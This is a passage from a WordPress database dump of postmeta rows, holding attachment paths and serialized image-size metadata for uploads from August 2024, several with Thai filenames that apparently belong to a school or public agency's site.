(1928,630,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119953_0.jpg\";s:8:\"filesize\";i:464412;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119953_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14597;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119953_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122284;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119953_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6806;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119953_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74105;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119953_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:237914;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119953_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18603;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1929,631,'_wp_attached_file','2024/08/S__62119955_0.jpg'),
(1930,631,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119955_0.jpg\";s:8:\"filesize\";i:547086;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119955_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16437;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119955_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146500;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119955_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7517;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119955_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88622;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119955_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:282558;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119955_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21439;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1931,632,'_wp_attached_file','2024/08/S__62119956_0.jpg'),
(1932,632,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119956_0.jpg\";s:8:\"filesize\";i:467169;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119956_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14279;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119956_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123273;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119956_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6589;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119956_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74278;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119956_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:240952;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119956_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18194;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1933,633,'_wp_attached_file','2024/08/S__62119945_0.jpg'),
(1934,633,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119945_0.jpg\";s:8:\"filesize\";i:397350;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119945_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12388;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119945_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103823;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119945_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5951;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119945_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62783;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119945_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:204735;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119945_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15627;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1935,634,'_wp_attached_file','2024/08/S__62119974_0.jpg'),
(1936,634,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119974_0.jpg\";s:8:\"filesize\";i:432275;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119974_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13979;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119974_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115091;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119974_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6348;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119974_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69838;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119974_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:223706;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119974_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17300;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1937,635,'_wp_attached_file','2024/08/S__62119976_0.jpg'),
(1938,635,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119976_0.jpg\";s:8:\"filesize\";i:418043;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119976_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14538;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119976_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110690;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119976_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6918;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119976_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68394;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119976_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:214277;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119976_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17884;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1939,636,'_wp_attached_file','2024/08/S__62119977_0.jpg'),
(1940,636,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119977_0.jpg\";s:8:\"filesize\";i:340104;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119977_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11494;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119977_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89046;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119977_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5300;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119977_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54378;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119977_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:173969;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119977_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14133;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1941,637,'title_style','default'),
(1942,637,'_title_style','field_5d1a0217cf408'),
(1943,638,'title_style','default'),
(1944,638,'_title_style','field_5d1a0217cf408'),
(1945,639,'title_style','default'),
(1946,639,'_title_style','field_5d1a0217cf408'),
(1954,640,'title_style','default'),
(1955,640,'_title_style','field_5d1a0217cf408'),
(1956,641,'title_style','default'),
(1957,641,'_title_style','field_5d1a0217cf408'),
(1958,642,'title_style','default'),
(1959,642,'_title_style','field_5d1a0217cf408'),
(1960,643,'_edit_lock','1723026335:1'),
(1961,644,'_wp_attached_file','2024/08/ประวัติโรงเรียนโดยย่อ.pdf'),
(1962,644,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:207044;}'),
(1963,645,'_wp_attached_file','2024/08/ประวัติโรงเรียนโดยย่อ_page-0001.jpg'),
(1964,645,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1241;s:6:\"height\";i:1755;s:4:\"file\";s:85:\"2024/08/ประวัติโรงเรียนโดยย่อ_page-0001.jpg\";s:8:\"filesize\";i:519370;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:85:\"ประวัติโรงเรียนโดยย่อ_page-0001-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10260;}s:5:\"large\";a:5:{s:4:\"file\";s:86:\"ประวัติโรงเรียนโดยย่อ_page-0001-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80015;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:85:\"ประวัติโรงเรียนโดยย่อ_page-0001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5304;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:86:\"ประวัติโรงเรียนโดยย่อ_page-0001-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86853;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:87:\"ประวัติโรงเรียนโดยย่อ_page-0001-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148186;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:85:\"ประวัติโรงเรียนโดยย่อ_page-0001-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14884;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1965,643,'_edit_last','1'),
(1966,643,'title_style','default'),
(1967,643,'_title_style','field_5d1a0217cf408'),
(1968,646,'title_style','default'),
(1969,646,'_title_style','field_5d1a0217cf408'),
(1971,648,'title_style','default'),
(1972,648,'_title_style','field_5d1a0217cf408'),
(1974,650,'_edit_lock','1723025922:1'),
(1975,651,'_wp_attached_file','2024/08/ข้อมูลพื้นฐาน.docx'),
(1976,651,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:368601;}'),
(1977,652,'_wp_attached_file','2024/08/ข้อมูลพื้นฐาน.pdf'),
(1978,652,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:367679;}'),
(1979,650,'_edit_last','1'),
(1980,650,'title_style','default'),
(1981,650,'_title_style','field_5d1a0217cf408'),
(1982,653,'title_style','default'),
(1983,653,'_title_style','field_5d1a0217cf408'),
(1985,655,'title_style','default'),
(1986,655,'_title_style','field_5d1a0217cf408'),
(1987,656,'_edit_lock','1723026378:1'),
(1988,657,'_wp_attached_file','2024/08/วิสัยทัศน์.pdf'),
(1989,657,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:89571;}'),
(1990,656,'_edit_last','1'),
(1991,656,'title_style','default'),
(1992,656,'_title_style','field_5d1a0217cf408'),
(1993,658,'title_style','default'),
(1994,658,'_title_style','field_5d1a0217cf408'),
(1995,659,'title_style','default'),
(1996,659,'_title_style','field_5d1a0217cf408'),
(2011,660,'_wp_attached_file','2024/08/ปขก1-1.png'),
(2012,660,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:24:\"2024/08/ปขก1-1.png\";s:8:\"filesize\";i:1260980;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"ปขก1-1-300x120.png\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:65918;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"ปขก1-1-1024x410.png\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:506005;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"ปขก1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37636;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"ปขก1-1-768x307.png\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:314804;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"ปขก1-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:105150;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2013,661,'_wp_attached_file','2024/08/ปขก.png'),
(2014,661,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:21:\"2024/08/ปขก.png\";s:8:\"filesize\";i:280573;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"ปขก-300x120.png\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29604;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"ปขก-1024x410.png\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:203860;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"ปขก-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11839;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"ปขก-768x307.png\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:128403;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"ปขก-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44001;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2016,663,'title_style','default'),
(2017,663,'_title_style','field_5d1a0217cf408'),
(2019,665,'title_style','default'),
(2020,665,'_title_style','field_5d1a0217cf408'),
(2021,666,'_wp_attached_file','2024/08/ปขก2-1.png'),
(2022,666,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:24:\"2024/08/ปขก2-1.png\";s:8:\"filesize\";i:1902397;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"ปขก2-1-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:89100;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"ปขก2-1-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:680870;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"ปขก2-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40366;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"ปขก2-1-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:424201;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"ปขก2-1-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1307038;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"ปขก2-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:113427;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2023,667,'title_style','default'),
(2024,667,'_title_style','field_5d1a0217cf408'),
(2025,668,'_wp_attached_file','2024/08/ปขก3.png'),
(2026,668,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:22:\"2024/08/ปขก3.png\";s:8:\"filesize\";i:331175;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"ปขก3-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33690;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"ปขก3-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:215906;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"ปขก3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12369;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"ปขก3-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:136759;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:23:\"ปขก3-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:398058;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"ปขก3-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44231;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2027,669,'title_style','default'),
(2028,669,'_title_style','field_5d1a0217cf408'),
(2029,670,'title_style','default'),
(2030,670,'_title_style','field_5d1a0217cf408'),
(2031,671,'title_style','default'),
(2032,671,'_title_style','field_5d1a0217cf408'),
(2033,672,'title_style','default'),
(2034,672,'_title_style','field_5d1a0217cf408'),
(2035,673,'title_style','default'),
(2036,673,'_title_style','field_5d1a0217cf408'),
(2038,675,'title_style','default'),
(2039,675,'_title_style','field_5d1a0217cf408'),
(2041,677,'title_style','default'),
(2042,677,'_title_style','field_5d1a0217cf408'),
(2043,678,'title_style','default'),
(2044,678,'_title_style','field_5d1a0217cf408'),
(2045,679,'title_style','default'),
(2046,679,'_title_style','field_5d1a0217cf408'),
(2047,680,'_edit_lock','1723099400:1'),
(2048,681,'_wp_attached_file','2024/08/ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf'),
(2049,681,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:118058;}'),
(2050,680,'_edit_last','1'),
(2051,680,'title_style','default'),
(2052,680,'_title_style','field_5d1a0217cf408'),
(2053,682,'title_style','default'),
(2054,682,'_title_style','field_5d1a0217cf408'),
(2055,683,'title_style','default'),
(2056,683,'_title_style','field_5d1a0217cf408'),
(2058,685,'title_style','default'),
